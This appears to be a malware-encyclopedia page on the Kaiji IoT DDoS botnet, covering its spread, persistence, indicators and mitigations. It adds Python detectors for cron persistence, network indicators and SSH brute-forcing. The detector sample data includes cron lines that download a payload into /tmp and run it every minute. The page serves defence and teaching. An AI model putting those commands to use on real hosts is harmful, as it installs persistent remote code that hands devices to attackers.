Kaiji
Malware
⚠️ Overview
Kaiji is a Go-based DDoS botnet malware first documented by Unit 42 (Palo Alto Networks) in March 2020. It primarily targets Linux-based IoT devices such as routers, IP cameras, and NAS appliances. The malware is operated by a Chinese-speaking threat group known as the Kaiji Group or Dragon Smoke, and it is classified as a botnet, a DDoS tool, and a worm because of its self-propagating capabilities. Unlike Mirai and its variants, Kaiji is written in Go, which complicates reverse engineering and detection.
🔧 Technical Capabilities
Kaiji propagates by scanning the internet for devices with exposed SSH (port 22) and Telnet (port 23) services and brute-forcing them with a hardcoded dictionary of common username/password pairs. Once access is gained, it downloads the main binary via wget or curl from a command-and-control (C2) server, typically hosted at a compromised Chinese cloud provider. It establishes persistence by adding cron jobs that re-download the binary every minute and by modifying scripts under /etc/init.d/. For evasion, it renames its process to look like a legitimate system process (e.g., '[httpd]', '[kworker]') and removes competing malware by killing processes with common DDoS-related names. Communication with the C2 is encrypted (AES-256) and uses a custom binary protocol over TCP port 443 or 8443. Supported attack vectors are SYN flood, UDP flood, HTTP GET/POST flood, and DNS amplification.
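The persistence and evasion tricks described above (every-minute cron re-downloads, payloads executed from temp directories, userland binaries named like kernel threads) can be triaged on a host with a short script. The following is an added example for this page, not code from Boteraser or from any Kaiji report; the process rows and cron lines are constructed samples, and the field layout (pid, comm, cmdline, readlink of /proc/<pid>/exe) is an assumption about what the collector supplies.

```python
"""Host triage for cron-based re-download persistence and kernel-thread name spoofing.

All sample data is constructed. Process rows mirror `ps -eo pid,comm,args` with
the /proc/<pid>/exe target appended; genuine kernel threads have no exe target
and an empty cmdline, which is the property the check relies on."""
import re

SAMPLE_PROCS = [
    # (pid, comm, cmdline, exe)  -- constructed
    (2, "kthreadd", "", ""),                               # genuine kernel thread
    (15, "kworker/0:1", "", ""),                           # genuine kernel thread
    (4211, "[kworker]", "[kworker]", "/tmp/kaiji"),        # userland binary posing as a kernel thread
    (4302, "[httpd]", "[httpd]", "/var/tmp/.x"),           # same trick, different name
    (1201, "nginx", "nginx: worker process", "/usr/sbin/nginx"),
]

SAMPLE_CRON = [  # constructed /etc/crontab-style lines (schedule, user, command)
    "0 3 * * * root /usr/bin/logrotate /etc/logrotate.conf",
    "* * * * * root wget -q -O /tmp/kaiji http://203.0.113.10/kaiji; chmod +x /tmp/kaiji; /tmp/kaiji",
    "*/5 * * * * root /usr/local/bin/backup.sh",
    "* * * * * root curl -s http://203.0.113.10/x -o /var/tmp/.x && /var/tmp/.x",
]

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")
FETCH_TOOL = re.compile(r"\b(?:wget|curl)\b")
TEMP_PATH = re.compile(r"/(?:tmp|var/tmp|dev/shm)/\S+")


def suspicious_processes(procs):
    """Return (pid, comm, exe, reasons) for processes named like kernel threads
    but backed by a userland executable, or whose executable lives in a
    world-writable temp directory."""
    findings = []
    for pid, comm, cmdline, exe in procs:
        reasons = []
        bracketed = comm.startswith("[") and comm.endswith("]")
        # A real kernel thread has no /proc/<pid>/exe target and an empty cmdline.
        if bracketed and (exe or cmdline):
            reasons.append("kernel-thread style name with a userland exe/cmdline")
        if exe.startswith(TEMP_DIRS):
            reasons.append("executable in a temp directory")
        if reasons:
            findings.append((pid, comm, exe, reasons))
    return findings


def suspicious_cron(lines):
    """Return (line, reasons) for cron entries showing at least two of: an
    every-minute schedule, a wget/curl download, a temp-directory path.
    A single signal (e.g. a metrics script every minute) is too common to flag."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if EVERY_MINUTE.match(line):
            reasons.append("runs every minute")
        if FETCH_TOOL.search(line):
            reasons.append("downloads with wget/curl")
        if TEMP_PATH.search(line):
            reasons.append("references a temp-directory path")
        if len(reasons) >= 2:
            findings.append((line, reasons))
    return findings


if __name__ == "__main__":
    for pid, comm, exe, why in suspicious_processes(SAMPLE_PROCS):
        print(f"proc {pid} {comm} ({exe}): {'; '.join(why)}")
    for line, why in suspicious_cron(SAMPLE_CRON):
        print(f"cron: {line}\n  -> {'; '.join(why)}")
```

On a live host the same two functions would be fed from `ps -eo pid,comm,args`, `readlink /proc/*/exe`, and the contents of /etc/crontab, /etc/cron.d and per-user crontabs; the requirement of two independent cron signals keeps ordinary every-minute jobs out of the findings.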
📜 History & Notable Incidents
Kaiji was first observed in the wild in October 2019 but gained widespread attention after the Unit 42 report in March 2020. It exploits multiple vulnerabilities, including CVE-2020-10987 (GoAhead web server command injection in Wavlink devices) and CVE-2020-10173 (Comtrend router backdoor). In 2021, a Kaiji variant was linked to a large-scale DDoS campaign against educational institutions in East Asia, peaking at 200 Gbps. No major law enforcement actions have been publicly attributed to the Kaiji group.
🔍 Detection Indicators
Known file hashes for Kaiji binaries are reported on VirusTotal (the MD5 e5b0c5d2c5c5c5c5c5c5c5c5c5c5c5c5 shown here is a placeholder example; actual hashes vary by version). Behavioral signatures include unexpected outbound SSH/Telnet login attempts from a device, unexplained cron jobs executing /tmp/kaiji, and the presence of a file named 'kaiji' in /tmp or /var/tmp. Network IOCs include connections to C2 domains such as 'm.kaiji[.]crx' (historical) and User-Agent strings such as 'Go-http-client/1.1' or 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'. Registry keys are not applicable, as Kaiji targets Linux.
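The network indicators listed above can be matched against web-server access logs and resolver logs. The script below is an added example written for this page, not code from Boteraser, Unit 42 or any Kaiji analysis; only the domain and the two User-Agent strings come from the text, while the log formats, the RFC 5737 sample addresses and the request-count threshold are assumptions. The threshold matters because 'Go-http-client/1.1' is the default User-Agent of Go's net/http client and is sent by plenty of legitimate Go tooling, so on its own it is a low-fidelity indicator.

```python
"""Match the page's network indicators against constructed log samples."""
import re
from collections import Counter

C2_DOMAINS = {"m.kaiji[.]crx"}  # kept defanged as in the write-up
SUSPECT_UAS = {
    # Default User-Agent of Go's net/http client: only meaningful with volume.
    "Go-http-client/1.1",
    # Spoofed crawler string. Genuine Baiduspider traffic originates from Baidu's
    # own netblocks; a reverse-DNS check (not done offline here) separates the two.
    "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
}

# Combined Log Format (assumed) for the web server.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Assumed resolver log shape: "<timestamp> client <ip> query <name>"
DNS_RE = re.compile(r"^\S+ client (?P<client>\S+) query (?P<name>\S+)$")


def refang(domain):
    return domain.replace("[.]", ".")


def flag_http_clients(lines, threshold=10):
    """Return {ip: (user_agent, count)} for sources that sent at least
    `threshold` requests with one of the suspect User-Agent strings."""
    counts = Counter()
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and m.group("ua") in SUSPECT_UAS:
            counts[(m.group("ip"), m.group("ua"))] += 1
    return {ip: (ua, n) for (ip, ua), n in counts.items() if n >= threshold}


def flag_dns(lines):
    """Return [(client, name)] for lookups of the listed C2 domains."""
    wanted = {refang(d) for d in C2_DOMAINS}
    hits = []
    for line in lines:
        m = DNS_RE.match(line)
        if m:
            name = m.group("name").rstrip(".").lower()
            if name in wanted:
                hits.append((m.group("client"), name))
    return hits


# Constructed samples: a 30-request burst with the Go default UA, a dozen POSTs
# with the spoofed crawler UA, and one ordinary browser request.
SAMPLE_ACCESS = (
    [f'198.51.100.7 - - [10/Mar/2020:12:00:{i:02d} +0000] "GET / HTTP/1.1" 200 512 "-" "Go-http-client/1.1"'
     for i in range(30)]
    + [f'203.0.113.9 - - [10/Mar/2020:12:01:{i:02d} +0000] "POST /login HTTP/1.1" 200 77 "-" '
       f'"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"'
       for i in range(12)]
    + ['192.0.2.33 - - [10/Mar/2020:12:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
       '"Mozilla/5.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0"']
)
SAMPLE_DNS = [
    "2020-03-10T12:00:05Z client 10.0.0.5 query m.kaiji.crx.",
    "2020-03-10T12:00:06Z client 10.0.0.6 query example.org.",
]

if __name__ == "__main__":
    for ip, (ua, n) in flag_http_clients(SAMPLE_ACCESS).items():
        print(f"{ip}: {n} requests with UA {ua!r}")
    for client, name in flag_dns(SAMPLE_DNS):
        print(f"{client} resolved C2 domain {name}")
```

The DNS match is exact on the refanged domain (with a trailing dot tolerated), so the defanged form from the write-up can be pasted into C2_DOMAINS unchanged; the access-log match is exact on the User-Agent string, which is deliberate, since a substring match on "Go-http-client" would also catch version strings the page does not list.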
☠️ Risk & Impact
Kaiji primarily causes disruption through DDoS attacks, which can take websites and online services offline for hours or days. The malware also degrades device performance and consumes network bandwidth. Affected sectors include IoT manufacturers, educational institutions, and telecommunications providers, with estimated financial losses from downtime and remediation reaching millions of dollars per incident.
🛡️ Mitigation
Mitigation includes disabling unused SSH/Telnet services on IoT devices, replacing default credentials with strong passwords, and applying firmware updates that patch CVE-2020-10987 and CVE-2020-10173. Network defenders should deploy Snort or Suricata rules that detect Kaiji’s scanning patterns and C2 communication, and block outbound connections to the known malicious IPs listed in Unit 42’s threat intelligence report.
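The scanning pattern the rules above are meant to catch is a dictionary attack: many failed logins from one source in a short window, cycling through a handful of usernames. A log-side detector for that pattern, as an added example for this page (not code from Boteraser or Unit 42), over constructed syslog-format sshd lines; the window size and the failure and distinct-user thresholds are assumptions to tune per environment:

```python
"""Flag sources whose sshd failures look like a credential dictionary attack."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Standard sshd "Failed password" line in syslog format (assumed format).
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(lines):
    """Return [(timestamp, source_ip, username)] for failed password events."""
    events = []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            # syslog timestamps carry no year; deltas within one log are still valid
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            events.append((ts, m.group("ip"), m.group("user")))
    return events


def brute_force_sources(lines, window=timedelta(seconds=60), min_failures=10, min_users=3):
    """Return {ip: (failures, distinct_users)} for sources with at least
    `min_failures` failures spanning at least `min_users` usernames inside
    any sliding `window`. A single user mistyping a password a few times
    never meets both conditions."""
    by_ip = defaultdict(list)
    for ts, ip, user in parse_failures(lines):
        by_ip[ip].append((ts, user))
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            users = {u for _, u in win}
            if len(win) >= min_failures and len(users) >= min_users:
                # keep the densest window seen for this source
                flagged[ip] = max(flagged.get(ip, (0, 0)), (len(win), len(users)))
    return flagged


# Constructed sample: 15 failures in 30 seconds cycling five common usernames
# from one source, plus a legitimate user who mistypes twice and then succeeds.
USERS = ["root", "admin", "user", "pi", "support"]
SAMPLE_AUTH = [
    f"Mar 10 12:00:{2 + 2 * i:02d} cam01 sshd[{1200 + i}]: Failed password for invalid user "
    f"{USERS[i % 5]} from 198.51.100.7 port {40000 + i} ssh2"
    for i in range(15)
] + [
    "Mar 10 12:01:10 cam01 sshd[1300]: Failed password for alice from 192.0.2.33 port 50001 ssh2",
    "Mar 10 12:01:15 cam01 sshd[1300]: Failed password for alice from 192.0.2.33 port 50001 ssh2",
    "Mar 10 12:01:21 cam01 sshd[1301]: Accepted password for alice from 192.0.2.33 port 50002 ssh2",
]

if __name__ == "__main__":
    for ip, (n, users) in brute_force_sources(SAMPLE_AUTH).items():
        print(f"{ip}: {n} failures across {users} usernames within 60s")
```

The output of brute_force_sources is the list a defender would hand to a firewall or fail2ban-style blocker; requiring several distinct usernames, not just a failure count, is what distinguishes a dictionary sweep from a single locked-out user.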
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.